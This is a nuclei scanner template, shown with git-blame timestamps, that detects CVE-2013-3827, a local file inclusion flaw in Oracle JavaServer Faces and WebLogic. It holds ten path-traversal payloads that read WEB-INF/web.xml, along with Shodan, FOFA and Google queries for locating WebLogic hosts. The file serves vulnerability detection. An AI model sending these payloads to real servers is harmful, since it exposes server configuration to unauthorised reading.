nuclei-templates/http/cves/2013/CVE-2013-3827.yaml

69 lines
2.8 KiB
YAML
Raw Normal View History

2021-06-30 10:50:41 +00:00
id: CVE-2013-3827
info:
2021-07-17 16:14:56 +00:00
name: Javafaces LFI
2021-06-30 10:50:41 +00:00
author: Random-Robbie
severity: medium
description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest patches and updates for the affected software to fix the LFI vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
- https://www.oracle.com/security-alerts/cpuoct2013.html
- http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
2023-07-11 19:49:27 +00:00
- http://rhn.redhat.com/errata/RHSA-2014-0029.html
classification:
2022-09-06 01:33:31 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2013-3827
2022-09-06 01:33:31 +00:00
cwe-id: NVD-CWE-noinfo
epss-score: 0.64598
epss-percentile: 0.97602
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*
metadata:
max-request: 10
2023-07-11 19:49:27 +00:00
vendor: oracle
product: fusion_middleware
shodan-query:
- http.title:"weblogic"
- http.html:"weblogic application server"
fofa-query:
- title="weblogic"
- body="weblogic application server"
2024-05-31 19:23:20 +00:00
google-query: intitle:"weblogic"
2024-01-14 09:21:50 +00:00
tags: cve,cve2013,edb,lfi,javafaces,oracle
2021-06-30 10:50:41 +00:00
http:
2021-06-30 10:50:41 +00:00
- method: GET
path:
- "{{BaseURL}}{{paths}}"
2024-04-12 10:51:25 +00:00
payloads:
paths:
- "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
2021-07-17 16:14:56 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2021-06-30 10:50:41 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-06-30 10:50:41 +00:00
words:
2021-07-17 16:14:56 +00:00
- "<web-app"
- "</web-app>"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100a5aaa0cf657fb07a07b2e7f3dbfb89dfcfd5ecbec95eebcc67d0a16b7027742b02205cda39d97b2037ad46ec76430102bb2e98c99138c3a92af1bca614d667d8489c:922c64590222798bb761d5b6d8e72950